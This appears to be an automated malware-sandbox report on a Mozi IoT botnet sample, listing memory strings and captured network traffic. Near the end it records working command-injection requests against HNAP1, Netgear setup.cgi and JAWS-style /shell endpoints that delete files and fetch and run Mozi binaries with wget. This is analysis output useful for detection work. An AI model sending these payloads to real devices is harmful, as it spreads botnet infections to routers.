0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 21 Jan 2022 03:33:48 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/7.2.20Content-Length: 216Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 47 70 6f 6e 46 6f 72 6d 2f 64 69 61 67 5f 46 6f 72 6d 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /GponForm/diag_Form was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-control:no-cache
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveContent-Type: text/htmlTransfer-Encoding: chunkedContent-Encoding: gzipVary: Accept-EncodingDate: Fri, 21 Jan 2022 03:34:24 GMTServer: LiteSpeedData Raw: 31 33 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a d9 72 ab ca 7a be df 4f 41 9c 4a 72 4e b1 bc 98 25 e4 63 af 04 10 93 24 10 20 81 84 52 a9 5d 08 9a 41 8c 62 96 52 79 a0 bc 46 9e 2c 85 6c 2f cb b2 bd d7 4e 2a 17 e9 1b 44 ff dd df 3f ff dd ea e6 b7 df 7e 7b fc bb e9 92 5b db 1a 0f 85 75 9a fc f8 ed f1 f9 01 41 10 f4 18 02 c7 fb f1 db e5 67 0a 6a 07 0a eb ba b8 07 c7 26 6a 9f ee b8 3c ab 41 56 df d7 a7 02 dc 41 ee f3 db d3 5d 0d fa 1a 19 20 fe 06 b9 a1 53 56 a0 7e 6a 6a ff 9e be fb 12 c7 71 43 70 3f cc 2f f3 e4 0a 28 cb ef dd 81 f4 e5 44 ad 74 82 d4 f9 9f cc e0 fb 22 2a 41 75 35 05 7d 87 9e 39 29 78 ba 6b 23 d0 15 79 59 5f 0d eb 22 af 0e 9f 3c d0 46 2e b8 bf bc 7c 83 a2 2c aa 23 27 b9 af 5c 27 01 4f d8 f7 9f 50 75 54 27 e0 07 89 92 90 9a d7 90 90 37 99 f7 88 3c 77 3e 9b b2 aa 4f 09 80 06 bb bd 98 cb ad aa 17 39 06 53 ef 73 ef 04 fd fb 65 e8 f0 3a 34 3f cf ea 7b df 49 a3 e4 f4 00 31 65 e4 24 df 20 09 24 2d a8 23 d7 f9 06 55 4e 56 dd 57 a0 8c fc bf 7d 9c 56 45 67 f0 00 61 64 d1 bf 27 26 51 06 ee 43 10 05 61 fd 00 61 df 49 9c a6 c6 18 89 4f de 8f da 3b 6e 1c 94 83 0e f7 6e 9e e4 e5 03 f4 f7 fe a5 bd 1f f6 4a c3 05 02 27 d0 f7 b4 c2 f1 bc 28 0b 1e a0 9b fe d4 29 83 28 7b d7 fd 1f 3f c5 af 80 5b 47 79 f6 0d f2 f3 bc 06 e5 8d 3d bc a8 2a 12 e7 f4 00 ed 93 dc 8d ff 0f d8 7d 1f e2 cf 89 b2 0f 9c 9e 85 bc 4f 80 5f 3f 40 4e 53 e7 ef 99 bd 90 cb 67 2b 7e a4 bf e9 0e 61 e8 b5 07 de 34 fd 5e 82 aa c8 b3 0a dc 47 99 9f df 28 fa 6a 57 ee d2 de 78 5f 4d af 6a a7 6e aa 7b 37 f7 c0 cd e4 4b d4 3c bb 9f 42 d1 7f f8 a3 d9 25 70 aa 3c fb 7a 3e 4e 5d cf 1f 42 f2 2b 17 5c 49 76 b1 a9 5b 5f f4 fa f6 d3 b3 df 9f 79 dd 0f 85 e2 86 e1 ab b6 e8 a5 7d 2a ef 10 4b 43 60 38 c9 67 e6 ba 8a d6 12 14 c0 a9 1f a0 2c bf 7f fe f9 06 37 88 7f 35 f2 95 2b 3e 21 18 92 79 3f ec 95 26 5c da 1b ed 4a cb 5b 89 9c 2f 94 fa f3 10 f7 51 0d d2 ea 06 e6 67 24 e1 68 d1 7f 48 a5 28 7b 4b e5 09 f1 45 a0 5d fb e3 06 fd 25 8e f7 79 5d e7 e9 03 34 f0 78 53 f6 67 05 7a 29 25 a3 6b e2 95 25 de e1 df 9a 61 70 f7 bd 07 dc bc 74 06 ff 3d 40 4d e6 81 72 28 42 ef 19 bd 5a 9c c4 69 96 bb f2 c6 97 7c 1e c2 bc 05 e5 55 7c bd 17 e3 c1 cf dd a6 fa 9a ec b8 75 d4 de 66 ce ab 10 38 33 22 27 a3 37 01 af 84 f8 3a 8a 5f eb da 67 8e ba 4a 49 ec 0b 33 36 c9 8d 6f 7e 66 5a 94 5d 6a f6 27 35 2f 89 aa fa fe b2 ac 0c 01 9f 01 28 6f ea 2a f2 c0 e5 e5 4d fc c1 91 af d2 dd 14 e3 9f e1 75 d5 ff a6 6d 93 40 49 74 23 96 9f e4 43 7e 0d 95 f1 3d 87 8b a7 9d 24 0a b2 07 c8 05 59 0d ca 37 fa 1b e4 f7 9b bc 79 09 fa cf 38 5d 16 dc 07 08 fb aa 86 0d 75 f3 3e 4a 9d e0 d6 8d 3f 95 fa b2 f6 5e a6 0e bb 9c 28 0b 6e f5 1b d6 dc ee 65 7d dc e7 89 f7 a6 c5 60 c7 6b 2d 3f da a0 cb 4b ef 7e 5f 02 27 7e 80 2e 8f 7b 27 49 de 03 fc 29 ad 2a 50 b6 a0 84 1c cf 2b 41 75 5b 12 be 16 e1 cd cc 9f 2e 9f d7 13 6f 3d 74 1d 23 a3 9b 52 f3 01 f6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 21 Jan 2022 03:34:54 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1566Date: Fri, 21 Jan 2022 03:35:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 14Content-Type: text/plainData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a Data Ascii: 404 Not Found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 21 Jan 2022 10:00:53 GMTServer: webX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 21 Jan 2022 03:35:50 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 21 Jan 2022 03:35:54 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 271Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at localhost Port 80</address></body></html>

Source: networks.30.dr	String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: ZFvtIZszMd, networks.30.dr	String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: networks.30.dr	String found in binary or memory: http://%s:%d/Mozi.m
Source: ZFvtIZszMd, networks.30.dr	String found in binary or memory: http://%s:%d/Mozi.m;
Source: ZFvtIZszMd, networks.30.dr	String found in binary or memory: http://%s:%d/Mozi.m;$
Source: ZFvtIZszMd, networks.30.dr	String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: networks.30.dr	String found in binary or memory: http://%s:%d/bin.sh
Source: ZFvtIZszMd, networks.30.dr	String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: networks.30.dr	String found in binary or memory: http://127.0.0.1
Source: ZFvtIZszMd, networks.30.dr	String found in binary or memory: http://127.0.0.1sendcmd
Source: ZFvtIZszMd, networks.30.dr	String found in binary or memory: http://HTTP/1.1
Source: ZFvtIZszMd, networks.30.dr	String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: kmod.sh.30.dr	String found in binary or memory: http://git.kernel.org/cgit/utils/kernel/kmod/kmod.git/commit/libkmod/libkmod-module.c?id=fd44a98ae2e
Source: .config.30.dr	String found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
Source: networks.30.dr	String found in binary or memory: http://ipinfo.io/ip
Source: alsa-info.sh.30.dr	String found in binary or memory: http://pastebin.ca)
Source: alsa-info.sh.30.dr	String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
Source: alsa-info.sh.30.dr	String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
Source: ZFvtIZszMd, networks.30.dr	String found in binary or memory: http://purenetworks.com/HNAP1/
Source: networks.30.dr	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: networks.30.dr	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: ZFvtIZszMd, networks.30.dr	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: alsa-info.sh.30.dr	String found in binary or memory: http://www.alsa-project.org
Source: alsa-info.sh.30.dr	String found in binary or memory: http://www.alsa-project.org.
Source: alsa-info.sh.30.dr	String found in binary or memory: http://www.alsa-project.org/alsa-info.sh
Source: alsa-info.sh.30.dr	String found in binary or memory: http://www.alsa-project.org/cardinfo-db/
Source: alsa-info.sh.30.dr	String found in binary or memory: http://www.pastebin.ca
Source: alsa-info.sh.30.dr	String found in binary or memory: http://www.pastebin.ca.
Source: alsa-info.sh.30.dr	String found in binary or memory: http://www.pastebin.ca/upload.php
Source: motd-news.18.dr	String found in binary or memory: https://ubuntu.com/blog/microk8s-memory-optimisation

Source: unknown

HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 64.34.159.178:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>

Source: unknown

DNS traffic detected: queries for: dht.transmissionbt.com

Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 187.157.44.71:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 161.71.2.41:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 45.8.220.39:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 52.232.110.39:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
